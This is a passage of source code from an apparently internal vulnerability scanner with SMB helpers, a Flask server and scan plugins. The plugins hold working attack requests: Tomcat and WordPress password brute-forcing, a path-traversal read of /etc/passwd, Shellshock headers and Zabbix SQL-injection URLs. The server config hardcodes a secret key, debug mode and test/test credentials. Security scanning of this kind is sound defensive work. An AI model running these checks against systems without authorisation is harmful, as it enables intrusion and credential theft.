8 |
9 | try:
10 | from cStringIO import StringIO
11 | except ImportError:
12 | from StringIO import StringIO
13 |
14 | USE_NTLM = True
15 | MACHINE_NAME = None
16 |
17 | class SMBHandler(urllib2.BaseHandler):
18 |
19 | def smb_open(self, req):
20 | global USE_NTLM, MACHINE_NAME
21 |
22 | host = req.get_host()
23 | if not host:
24 | raise urllib2.URLError('SMB error: no host given')
25 | host, port = splitport(host)
26 | if port is None:
27 | port = 139
28 | else:
29 | port = int(port)
30 |
31 | # username/password handling
32 | user, host = splituser(host)
33 | if user:
34 | user, passwd = splitpasswd(user)
35 | else:
36 | passwd = None
37 | host = unquote(host)
38 | user = user or ''
39 |
40 | domain = ''
41 | if ';' in user:
42 | domain, user = user.split(';', 1)
43 |
44 | passwd = passwd or ''
45 | myname = MACHINE_NAME or self.generateClientMachineName()
46 |
47 | n = NetBIOS()
48 | names = n.queryIPForName(host)
49 | if names:
50 | server_name = names[0]
51 | else:
52 | raise urllib2.URLError('SMB error: Hostname does not reply back with its machine name')
53 |
54 | path, attrs = splitattr(req.get_selector())
55 | if path.startswith('/'):
56 | path = path[1:]
57 | dirs = path.split('/')
58 | dirs = map(unquote, dirs)
59 | service, path = dirs[0], '/'.join(dirs[1:])
60 |
61 | try:
62 | conn = SMBConnection(user, passwd, myname, server_name, domain=domain, use_ntlm_v2 = USE_NTLM)
63 | conn.connect(host, port)
64 |
65 | if req.has_data():
66 | data_fp = req.get_data()
67 | filelen = conn.storeFile(service, path, data_fp)
68 |
69 | headers = "Content-length: 0\n"
70 | fp = StringIO("")
71 | else:
72 | fp = self.createTempFile()
73 | file_attrs, retrlen = conn.retrieveFile(service, path, fp)
74 | fp.seek(0)
75 |
76 | headers = ""
77 | mtype = mimetypes.guess_type(req.get_full_url())[0]
78 | if mtype:
79 | headers += "Content-type: %s\n" % mtype
80 | if retrlen is not None and retrlen >= 0:
81 | headers += "Content-length: %d\n" % retrlen
82 |
83 | sf = StringIO(headers)
84 | headers = mimetools.Message(sf)
85 |
86 | return addinfourl(fp, headers, req.get_full_url())
87 | except Exception, ex:
88 | raise urllib2.URLError, ('smb error: %s' % ex), sys.exc_info()[2]
89 |
90 | def createTempFile(self):
91 | return tempfile.TemporaryFile()
92 |
93 | def generateClientMachineName(self):
94 | hostname = socket.gethostname()
95 | if hostname:
96 | return hostname.split('.')[0]
97 | return 'SMB%d' % os.getpid()
98 |
--------------------------------------------------------------------------------
/celerynode/vuldb/smb/__init__.py:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/celerynode/vuldb/smb/smb2_constants.py:
--------------------------------------------------------------------------------
1 |
2 | # Bitmask for Flags field in SMB2 message header
3 | SMB2_FLAGS_SERVER_TO_REDIR = 0x01
4 | SMB2_FLAGS_ASYNC_COMMAND = 0x02
5 | SMB2_FLAGS_RELATED_OPERATIONS = 0x04
6 | SMB2_FLAGS_SIGNED = 0x08
7 | SMB2_FLAGS_DFS_OPERATIONS = 0x10000000
8 |
9 | # Values for Command field in SMB2 message header
10 | SMB2_COM_NEGOTIATE = 0x0000
11 | SMB2_COM_SESSION_SETUP = 0x0001
12 | SMB2_COM_LOGOFF = 0x0002
13 | SMB2_COM_TREE_CONNECT = 0x0003
14 | SMB2_COM_TREE_DISCONNECT = 0x0004
15 | SMB2_COM_CREATE = 0x0005
16 | SMB2_COM_CLOSE = 0x0006
17 | SMB2_COM_FLUSH = 0x0007
18 | SMB2_COM_READ = 0x0008
19 | SMB2_COM_WRITE = 0x0009
20 | SMB2_COM_LOCK = 0x000A
21 | SMB2_COM_IOCTL = 0x000B
22 | SMB2_COM_CANCEL = 0x000C
23 | SMB2_COM_ECHO = 0x000D
24 | SMB2_COM_QUERY_DIRECTORY = 0x000E
25 | SMB2_COM_CHANGE_NOTIFY = 0x000F
26 | SMB2_COM_QUERY_INFO = 0x0010
27 | SMB2_COM_SET_INFO = 0x0011
28 | SMB2_COM_OPLOCK_BREAK = 0x0012
29 |
30 | SMB2_COMMAND_NAMES = {
31 | 0x0000: 'SMB2_COM_NEGOTIATE',
32 | 0x0001: 'SMB2_COM_SESSION_SETUP',
33 | 0x0002: 'SMB2_COM_LOGOFF',
34 | 0x0003: 'SMB2_COM_TREE_CONNECT',
35 | 0x0004: 'SMB2_COM_TREE_DISCONNECT',
36 | 0x0005: 'SMB2_COM_CREATE',
37 | 0x0006: 'SMB2_COM_CLOSE',
38 | 0x0007: 'SMB2_COM_FLUSH',
39 | 0x0008: 'SMB2_COM_READ',
40 | 0x0009: 'SMB2_COM_WRITE',
41 | 0x000A: 'SMB2_COM_LOCK',
42 | 0x000B: 'SMB2_COM_IOCTL',
43 | 0x000C: 'SMB2_COM_CANCEL',
44 | 0x000D: 'SMB2_COM_ECHO',
45 | 0x000E: 'SMB2_COM_QUERY_DIRECTORY',
46 | 0x000F: 'SMB2_COM_CHANGE_NOTIFY',
47 | 0x0010: 'SMB2_COM_QUERY_INFO',
48 | 0x0011: 'SMB2_COM_SET_INFO',
49 | 0x0012: 'SMB2_COM_OPLOCK_BREAK',
50 | }
51 |
52 | # Values for dialect_revision field in SMB2NegotiateResponse class
53 | SMB2_DIALECT_2 = 0x0202
54 | SMB2_DIALECT_21 = 0x0210
55 | SMB2_DIALECT_2ALL = 0x02FF
56 |
57 | # Bit mask for SecurityMode field in SMB2NegotiateResponse class
58 | SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
59 | SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
60 |
61 | # Values for ShareType field in SMB2TreeConnectResponse class
62 | SMB2_SHARE_TYPE_DISK = 0x01
63 | SMB2_SHARE_TYPE_PIPE = 0x02
64 | SMB2_SHARE_TYPE_PRINTER = 0x03
65 |
66 | # Bitmask for Capabilities in SMB2TreeConnectResponse class
67 | SMB2_SHARE_CAP_DFS = 0x0008
68 |
69 | # Values for OpLockLevel field in SMB2CreateRequest class
70 | SMB2_OPLOCK_LEVEL_NONE = 0x00
71 | SMB2_OPLOCK_LEVEL_II = 0x01
72 | SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08
73 | SMB2_OPLOCK_LEVEL_BATCH = 0x09
74 | SMB2_OPLOCK_LEVEL_LEASE = 0xFF
75 |
76 | # Values for FileAttributes field in SMB2CreateRequest class
77 | # The values are defined in [MS-FSCC] 2.6
78 | SMB2_FILE_ATTRIBUTE_ARCHIVE = 0x0020
79 | SMB2_FILE_ATTRIBUTE_COMPRESSED = 0x0800
80 | SMB2_FILE_ATTRIBUTE_DIRECTORY = 0x0010
81 | SMB2_FILE_ATTRIBUTE_ENCRYPTED = 0x4000
82 | SMB2_FILE_ATTRIBUTE_HIDDEN = 0x0002
83 | SMB2_FILE_ATTRIBUTE_NORMAL = 0x0080
84 | SMB2_FILE_ATTRIBUTE_NOTINDEXED = 0x2000
85 | SMB2_FILE_ATTRIBUTE_OFFLINE = 0x1000
86 | SMB2_FILE_ATTRIBUTE_READONLY = 0x0001
87 | SMB2_FILE_ATTRIBUTE_SPARSE = 0x0200
88 | SMB2_FILE_ATTRIBUTE_SYSTEM = 0x0004
89 | SMB2_FILE_ATTRIBUTE_TEMPORARY = 0x0100
90 |
91 | # Values for CreateAction field in SMB2CreateResponse class
92 | SMB2_FILE_SUPERCEDED = 0x00
93 | SMB2_FILE_OPENED = 0x01
94 | SMB2_FILE_CREATED = 0x02
95 | SMB2_FILE_OVERWRITTEN = 0x03
96 |
97 | # Values for InfoType field in SMB2QueryInfoRequest class
98 | SMB2_INFO_FILE = 0x01
99 | SMB2_INFO_FILESYSTEM = 0x02
100 | SMB2_INFO_SECURITY = 0x03
101 | SMB2_INFO_QUOTA = 0x04
102 |
--------------------------------------------------------------------------------
/celerynode/vuldb/smb/utils/__init__.py:
--------------------------------------------------------------------------------
1 |
2 | def convertFILETIMEtoEpoch(t):
3 | return (t - 116444736000000000L) / 10000000.0;
4 |
--------------------------------------------------------------------------------
/celerynode/vuldb/svn_entries_disclosure.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": ".svn代码泄露",
3 | "info": "未删除.svn目录导致源代码信息泄露",
4 | "level": "中危",
5 | "type": "信息泄露",
6 | "author": "0xbug",
7 | "url": "https://www.rapid7.com/db/vulnerabilities/spider-svn-entries-disclosure",
8 | "keyword": "server:web",
9 | "source": 1,
10 | "plugin": {
11 | "url": "/.svn/all-wcprops",
12 | "tag": "存在/.svn/目录",
13 | "analyzing": "keyword",
14 | "analyzingdata": "svn:wc:ra_dav:version-url",
15 | "data": "",
16 | "method": "GET"
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/celerynode/vuldb/tomcat_crackpass.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | # author:wolf
3 | import urllib2
4 | import base64
5 |
6 |
7 | def get_plugin_info():
8 | plugin_info = {
9 | "name": "Tomcat弱口令",
10 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。",
11 | "level": "高危",
12 | "type": "弱口令",
13 | "author": "wolf@YSRC",
14 | "url": "http://huaidan.org/archives/1207.html",
15 | "keyword": "tag:tomcat",
16 | "source": 1
17 | }
18 | return plugin_info
19 |
20 |
21 | def check(ip, port, timeout):
22 | error_i = 0
23 | flag_list = ['/manager/html/reload', 'Tomcat Web Application Manager']
24 | user_list = ['admin', 'manager', 'tomcat', 'apache', 'root']
25 | for user in user_list:
26 | for pass_ in PASSWORD_DIC:
27 | try:
28 | pass_ = str(pass_.replace('{user}', user))
29 | login_url = 'http://' + ip + ":" + str(port) + '/manager/html'
30 | request = urllib2.Request(login_url)
31 | auth_str_temp = user + ':' + pass_
32 | auth_str = base64.b64encode(auth_str_temp)
33 | request.add_header('Authorization', 'Basic ' + auth_str)
34 | res = urllib2.urlopen(request, timeout=timeout)
35 | res_code = res.code
36 | res_html = res.read()
37 | except urllib2.HTTPError, e:
38 | res_code = e.code
39 | res_html = e.read()
40 | except urllib2.URLError, e:
41 | error_i += 1
42 | if error_i >= 3: return
43 | continue
44 | if int(res_code) == 404: return
45 | if int(res_code) == 401 or int(res_code) == 403: continue
46 | for flag in flag_list:
47 | if flag in res_html:
48 | return u'Tomcat弱口令 %s:%s' % (user, pass_)
49 |
--------------------------------------------------------------------------------
/celerynode/vuldb/web_fileread.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import re
3 | import socket
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "WebServer任意文件读取",
9 | "info": "web容器对请求处理不当,可能导致可以任意文件读取(例:GET ../../../../../etc/passwd)。",
10 | "level": "高危",
11 | "type": "任意文件读取",
12 | "author": "wolf@YSRC",
13 | "url": "https://www.secpulse.com/archives/4276.html",
14 | "keyword": "server:web",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(ip, port, timeout):
21 | try:
22 | socket.setdefaulttimeout(timeout)
23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | s.connect((ip, int(port)))
25 | flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n"
26 | s.send(flag)
27 | data = s.recv(1024)
28 | s.close()
29 | if 'root:' in data and 'nobody:' in data:
30 | return u"web容器任意文件读取漏洞"
31 | except:
32 | pass
33 |
--------------------------------------------------------------------------------
/celerynode/vuldb/web_shellshock.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import urllib2
3 | import re
4 | import urlparse
5 | import HTMLParser
6 |
7 |
8 | def get_plugin_info():
9 | plugin_info = {
10 | "name": "shellshock破壳",
11 | "info": "攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,最终完全控制目标系统",
12 | "level": "紧急",
13 | "type": "命令执行",
14 | "author": "wolf@YSRC",
15 | "url": "http://www.freebuf.com/articles/system/45390.html",
16 | "keyword": "server:web",
17 | "source": 1
18 | }
19 | return plugin_info
20 |
21 |
22 | def get_url(domain, timeout):
23 | url_list = []
24 | res = urllib2.urlopen('http://' + domain, timeout=timeout)
25 | html = res.read()
26 | root_url = res.geturl()
27 | m = re.findall("]*?href=('|\")(.*?)\\1", html, re.I)
28 | if m:
29 | for url in m:
30 | ParseResult = urlparse.urlparse(url[1])
31 | if ParseResult.netloc and ParseResult.scheme:
32 | if domain == ParseResult.hostname:
33 | url_list.append(HTMLParser.HTMLParser().unescape(url[1]))
34 | elif not ParseResult.netloc and not ParseResult.scheme:
35 | url_list.append(HTMLParser.HTMLParser().unescape(urlparse.urljoin(root_url, url[1])))
36 | return list(set(url_list))
37 |
38 |
39 | def check(ip, port, timeout):
40 | try:
41 | url_list = get_url(ip + ":" + str(port), timeout)
42 | except Exception, e:
43 | return
44 | try:
45 | flag_list = ['() { :; }; /bin/expr 32001611 - 100', '{() { _; } >_[$($())] { /bin/expr 32001611 - 100; }}']
46 | i = 0
47 | for url in url_list:
48 | if '.cgi' in url:
49 | i += 1
50 | if i >= 4: return
51 | for flag in flag_list:
52 | header = {'cookie': flag, 'User-Agent': flag, 'Referrer': flag}
53 | try:
54 | request = urllib2.Request('http://' + url, headers=header)
55 | res_html = urllib2.urlopen(request).read()
56 | except urllib2.HTTPError, e:
57 | res_html = e.read()
58 | if "32001511" in res_html:
59 | return u'shellshock命令执行漏洞'
60 | except Exception, e:
61 | pass
62 |
--------------------------------------------------------------------------------
/celerynode/vuldb/wordpress_crackpass.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import urllib2
3 | import re
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "Wordpress弱口令",
9 | "info": "攻击者通过此漏洞进入后台,通过编辑功能可获取webshell,最终导致服务器被入侵控制。",
10 | "level": "高危",
11 | "type": "弱口令",
12 | "author": "wolf@YSRC",
13 | "url": "",
14 | "keyword": "tag:wordpress",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def get_user(url, timeout):
21 | user_list = []
22 | for i in range(1, 8):
23 | try:
24 | getuser_url = 'http://' + url + "/?author=" + str(i)
25 | res = urllib2.urlopen(getuser_url, timeout=timeout)
26 | res_html = res.read()
27 | pattern = "/author\/(.*)\/feed"
28 | p = "(.*?)(\||-)"
29 | m = re.search(pattern, res_html)
30 | if m:
31 | user_list.append(m.group(1).strip())
32 | else:
33 | m1 = re.search(p, res_html)
34 | if m1:
35 | user_list.append(m1.group(1).strip())
36 | except Exception, e:
37 | if len(user_list):
38 | return user_list
39 | else:
40 | return ['admin']
41 | if len(user_list):
42 | return user_list
43 | else:
44 | return ['admin']
45 |
46 |
47 | def check(ip, port, timeout):
48 | url = ip + ":" + str(port)
49 | flag_list = ['<name>isAdmin</name>', '<name>url</name>']
50 | user_list = get_user(url, timeout)
51 | error_i = 0
52 | for user_str in user_list:
53 | pass_list.append(user_str)
54 | try:
55 | if ':' in url:
56 | domain = url.split(':', 1)[0]
57 | else:
58 | domain = url
59 | domain_sp = domain.split('.')
60 | pass_list.append(domain)
61 | pass_list.append(domain_sp[0])
62 | pass_list.append(domain_sp[len(domain_sp) - 2] + "." + domain_sp[len(domain_sp) - 1])
63 | pass_list.append(domain_sp[len(domain_sp) - 2])
64 | except:
65 | pass
66 | for pass_str in PASSWORD_DIC:
67 | try:
68 | login_path = '/xmlrpc.php'
69 | PostStr = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>%s</value></param> <param><value>%s</value></param> </params></methodCall>" % (
70 | user_str, pass_str)
71 | request = urllib2.Request('http://' + url + login_path, PostStr)
72 | res = urllib2.urlopen(request, timeout=timeout)
73 | res_html = res.read()
74 | for flag in flag_list:
75 | if flag in res_html:
76 | return u'Wordpress后台弱口令,账号:%s 密码:%s' % (user_str, pass_str)
77 | except urllib2.URLError, e:
78 | error_i += 1
79 | if error_i >= 3: return
80 | except:
81 | return
82 |
--------------------------------------------------------------------------------
/celerynode/vuldb/zabbix_jsrpc_SQL.json:
--------------------------------------------------------------------------------
1 | {
2 | "info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。",
3 | "source": 1,
4 | "name": "zabbix jsrpc SQL注入",
5 | "keyword": "tag:zabbix",
6 | "level": "高危",
7 | "url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/1",
8 | "author": "wolf@YSRC",
9 | "type": "SQL注入",
10 | "plugin": {
11 | "url": "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x36),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17",
12 | "tag": "POC:/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or updatexml(1,md5(0x36),1) or 1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17",
13 | "analyzing": "keyword",
14 | "analyzingdata": "c5a880faf6fb5e6087eb1b2dc",
15 | "data": "",
16 | "method": "GET"
17 | }
18 | }
--------------------------------------------------------------------------------
/celerynode/vuldb/zabbix_latest_sql.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import re
3 | import urllib2
4 |
5 |
6 | def get_plugin_info():
7 | plugin_info = {
8 | "name": "Zabbix latest SQL注入",
9 | "info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。",
10 | "level": "高危",
11 | "type": "SQL注入",
12 | "author": "wolf@YSRC",
13 | "url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/2",
14 | "keyword": "tag:zabbix",
15 | "source": 1
16 | }
17 | return plugin_info
18 |
19 |
20 | def check(ip, port, timeout):
21 | try:
22 | url = "http://" + ip + ":" + str(port)
23 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
24 | request = opener.open(url + "/dashboard.php", timeout=timeout)
25 | res_html = request.read()
26 | except:
27 | return
28 | if 'href="slides.php?sid=' in res_html:
29 | m = re.search(r'href="slides\.php\?sid=(.+?)">', res_html, re.M | re.I)
30 | if m:
31 | sid = m.group(1)
32 | payload = "/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=(select%20updatexml(1,concat(0x7e,(SELECT%20md5(666)),0x7e),1))".format(
33 | sid=sid)
34 | res_html = opener.open(url + payload, timeout=timeout).read()
35 | if 'fae0b27c451c728867a567e8c1bb4e5' in res_html:
36 | return u"存在SQL注入,POC:" + payload
37 |
--------------------------------------------------------------------------------
/celerynode/vuldb/zookeeper_unauth_access.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import socket
3 |
4 |
5 | def get_plugin_info():
6 | plugin_info = {
7 | "name": "Zookeeper未授权访问",
8 | "info": "Zookeeper Unauthorized access",
9 | "level": "中危",
10 | "type": "未授权访问",
11 | "author": "c4bbage@qq.com",
12 | "url": "https://hackerone.com/reports/154369",
13 | "keyword": "server:Zookeeper",
14 | "source": 1
15 | }
16 | return plugin_info
17 |
18 |
19 | def check(ip, port, timeout):
20 | try:
21 | socket.setdefaulttimeout(timeout)
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.connect((ip, int(port)))
24 | flag = "envi"
25 | # envi
26 | # dump
27 | # reqs
28 | # ruok
29 | # stat
30 | s.send(flag)
31 | data = s.recv(1024)
32 | s.close()
33 | if 'Environment' in data:
34 | return u"Zookeeper Unauthorized access"
35 | except:
36 | pass
37 |
38 |
39 | def main():
40 | ip = "1.1.1.1"
41 | print check(ip, 2181, 2)
42 |
43 | if __name__ == '__main__':
44 | main()
45 |
--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "private": true,
3 | "entry": {
4 | "index": "./app/index.js"
5 | },
6 | "dependencies": {
7 | "antd": "^2.1.0",
8 | "axios": "^0.16.2",
9 | "echarts": "^3.6.1",
10 | "echarts-for-react": "^1.2.0",
11 | "eslint-plugin-import": "^1.16.0",
12 | "react": "^15.5.0",
13 | "react-dom": "^15.5.0",
14 | "react-router": "^3.0.2",
15 | "react-slick": "^0.14.11",
16 | "recharts": "^0.22.3",
17 | "screenfull": "^3.2.0"
18 | },
19 | "devDependencies": {
20 | "atool-build": "^0.9.0",
21 | "atool-test-mocha": "^0.1.4",
22 | "babel-eslint": "^7.0.0",
23 | "babel-plugin-import": "^1.0.1",
24 | "babel-plugin-transform-runtime": "^6.8.0",
25 | "babel-runtime": "^6.9.2",
26 | "dora": "0.4.x",
27 | "dora-plugin-webpack": "^0.8.1",
28 | "eslint": "^3.8.1",
29 | "eslint-config-airbnb": "^12.0.0",
30 | "eslint-plugin-import": "^2.0.1",
31 | "eslint-plugin-jsx-a11y": "^2.2.3",
32 | "eslint-plugin-react": "^6.4.1",
33 | "expect": "^1.20.1",
34 | "pre-commit": "1.x",
35 | "redbox-react": "^1.2.6"
36 | },
37 | "pre-commit": [
38 | "lint"
39 | ],
40 | "scripts": {
41 | "build": "atool-build",
42 | "lint": "eslint --ext .js,.jsx src/",
43 | "start": "dora --plugins webpack",
44 | "test": "atool-test-mocha ./**/__tests__/*-test.js"
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/server/Config.py:
--------------------------------------------------------------------------------
1 | #coding: utf8
2 |
3 | class ServerConfig(object):
4 | USERNAME = "test"
5 | PASSWORD = "test"
6 |
7 | class RedisConfig(object):
8 | HOST = "localhost"
9 | PORT = 6379
10 | PASSWORD = ""
11 | BR = 1
12 | HOSTSCANKEY = "hostScan"
13 | VULTASKKEY = "vulTask"
14 |
15 | class ElasticConfig(object):
16 | HOST = "localhost"
17 | PORT = "9200"
18 | USERNAME = ""
19 | PASSWORD = ""
20 | INDEX_CONFIG = {"index":"xfconfig", "type":"logs"}
21 | INDEX_ASSETS = {"index":"assets", "type":"logs"}
22 | INDEX_VULTASKS = {"index":"vulscan", "type":"data"}
--------------------------------------------------------------------------------
/server/Index.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | from datetime import timedelta
4 | from flask import Flask
5 | from Config import ServerConfig
6 |
7 | app = Flask(__name__)
8 | app.secret_key = "\xe8\xf7\xb9\xae\xfb\x87\xea4<5\xe7\x97D\xf4\x88)Q\xbd\xe1j'\x83\x13\xc7"
9 | app.config.from_object(ServerConfig)
10 | app.debug=True
11 |
12 | app.permanent_session_lifetime = timedelta(hours=6)
13 |
14 |
15 |
--------------------------------------------------------------------------------
/server/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/__init__.py
--------------------------------------------------------------------------------
/server/common.py:
--------------------------------------------------------------------------------
1 | #coding:utf8
2 | import re
3 |
4 | def checkip(ip):
5 | p = re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')
6 | if p.match(ip):
7 | return True
8 | else:
9 | return False
10 |
11 | def cleanPostData(data):
12 | data = data.replace(" ","") # 去掉空格
13 | data = data.split("\n") # 去掉换行
14 | while "" in data:
15 | data.remove("")
16 | return ",".join(data)
17 |
18 |
19 |
--------------------------------------------------------------------------------
/server/esinit.py:
--------------------------------------------------------------------------------
1 | #coding: utf8
2 | from Config import ElasticConfig
3 | from es import Es
4 | from vulscan import vulScan
5 |
6 | if __name__ == '__main__':
7 | es = Es()
8 | #初始化周期扫描配置
9 | es.init_scan_config()
10 | #初始化vultask脚本
11 | vulScan.init()
12 | print 'es初始化完成'
--------------------------------------------------------------------------------
/server/lib/Login.py:
--------------------------------------------------------------------------------
1 | #coding: utf8
2 | from functools import wraps
3 | from flask import session,url_for, redirect,logging
4 |
5 | # 登录状态检查
6 | def logincheck(f):
7 | @wraps(f)
8 | def wrapper(*args, **kwargs):
9 | try:
10 | if session.has_key('login'):
11 | if session['login'] == 'loginsuccess':
12 | return f(*args, **kwargs)
13 | else:
14 | return redirect(url_for('Login'))
15 | else:
16 | return redirect(url_for('Login'))
17 | except Exception, e:
18 | print e
19 | return redirect(url_for('Error'))
20 |
21 | return wrapper
22 |
23 |
24 | # 检查referer
25 | def anticsrf(f):
26 | @wraps(f)
27 | def wrapper(*args, **kwargs):
28 | try:
29 | if request.referrer and request.referrer.replace('http://', '').split('/')[0] == request.host:
30 | return f(*args, **kwargs)
31 | else:
32 | return redirect(url_for('NotFound'))
33 | except Exception, e:
34 | print e
35 | return redirect(url_for('Error'))
36 |
37 | return wrapper
--------------------------------------------------------------------------------
/server/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/lib/__init__.py
--------------------------------------------------------------------------------
/server/monitor/index.py:
--------------------------------------------------------------------------------
1 | #coding:utf8
2 | import sys
3 | import os
4 | import time
5 | import thread
6 |
7 | from verify import portCheck
8 | sys.path.append(os.path.split(os.path.realpath(__file__))[0]+"/../../")
9 | from server.es import Es
10 | from celerynode.api import api_hostScan
11 |
12 | if __name__ == "__main__":
13 | es = Es()
14 | thread.start_new_thread(portCheck,(es, "test"))
15 | try:
16 | ac_data = []
17 | while True:
18 | now_time = time.localtime()
19 | now_hour = now_time.tm_hour
20 | now_day = now_time.tm_mday
21 | now_date = str(now_time.tm_year) + str(now_time.tm_mon) + str(now_day)
22 | cy_day, ac_hour = es.get_scan_config()["scanPeriod"].split('|') #读取周期配置
23 | if now_hour == int(ac_hour) and now_day % int(cy_day) == 0 and now_date not in ac_data:
24 | ac_data.append(now_date)
25 | scanHosts = es.get_scan_config()["scanHosts"]
26 | scanPorts = es.get_scan_config()["scanPorts"]
27 | print (scanHosts, scanPorts)
28 | api_hostScan(hostsList=scanHosts, ports=scanPorts)
29 | time.sleep(60)
30 | except Exception, e:
31 | print e
--------------------------------------------------------------------------------
/server/monitor/verify.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import time
4 |
5 | sys.path.append(os.path.split(os.path.realpath(__file__))[0]+"/../../")
6 | from server.Config import ElasticConfig
7 | from celerynode.api import api_hostVerify
8 |
9 | def portCheck(es, test):
10 | while True:
11 | data = es.getAllData()
12 | for item in data:
13 | host = item["_source"]["host"]
14 | port = item["_source"]["port"]
15 | queue = item["_source"]["queue"]
16 | api_hostVerify(host, port, queue)
17 | time.sleep(1800)
--------------------------------------------------------------------------------
/server/redispool.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | import redis
4 | from Config import RedisConfig
5 |
6 | def getPoolBR():
7 | try:
8 | poolBR = redis.ConnectionPool(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR)
9 | return redis.Redis(connection_pool=poolBR)
10 | except Exception as e:
11 | print 'redis connect error'
12 | return 'None'
13 |
14 | def getStrictRedis():
15 | try:
16 | r = redis.StrictRedis(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR)
17 | return r
18 | except Exception as e:
19 | print 'redis connect error'
20 | return 'None'
21 |
--------------------------------------------------------------------------------
/server/run.py:
--------------------------------------------------------------------------------
1 | from Routes import app
2 |
3 | if __name__ == '__main__':
4 | # app.debug = True
5 | app.run(threaded=True, port=80,host='0.0.0.0')
6 |
--------------------------------------------------------------------------------
/server/static/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/server/static/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/server/static/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/server/static/images/wind.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/images/wind.jpeg
--------------------------------------------------------------------------------
/server/static/js/common.js:
--------------------------------------------------------------------------------
1 | !function(e){function t(n){if(r[n])return r[n].exports;var a=r[n]={exports:{},id:n,loaded:!1};return e[n].call(a.exports,a,a.exports,t),a.loaded=!0,a.exports}var n=window.webpackJsonp;window.webpackJsonp=function(c,o){for(var i,p,s=0,l=[];s<c.length;s++)p=c[s],a[p]&&l.push.apply(l,a[p]),a[p]=0;for(i in o){var u=o[i];switch(typeof u){case"object":e[i]=function(t){var n=t.slice(1),r=t[0];return function(t,a,c){e[r].apply(this,[t,a,c].concat(n))}}(u);break;case"function":e[i]=u;break;default:e[i]=e[u]}}for(n&&n(c,o);l.length;)l.shift().call(null,t);if(o[0])return r[0]=0,t(0)};var r={},a={0:0};t.e=function(e,n){if(0===a[e])return n.call(null,t);if(void 0!==a[e])a[e].push(n);else{a[e]=[n];var r=document.getElementsByTagName("head")[0],c=document.createElement("script");c.type="text/javascript",c.charset="utf-8",c.async=!0,c.src=t.p+""+({1:"index"}[e]||e)+".js",r.appendChild(c)}},t.m=e,t.c=r,t.p=""}(function(e){for(var t in e)if(Object.prototype.hasOwnProperty.call(e,t))switch(typeof e[t]){case"function":break;case"object":e[t]=function(t){var n=t.slice(1),r=e[t[0]];return function(e,t,a){r.apply(this,[e,t,a].concat(n))}}(e[t]);break;default:e[t]=e[e[t]]}return e}([]));
--------------------------------------------------------------------------------
/server/templates/error.html:
--------------------------------------------------------------------------------
1 | 别搞我
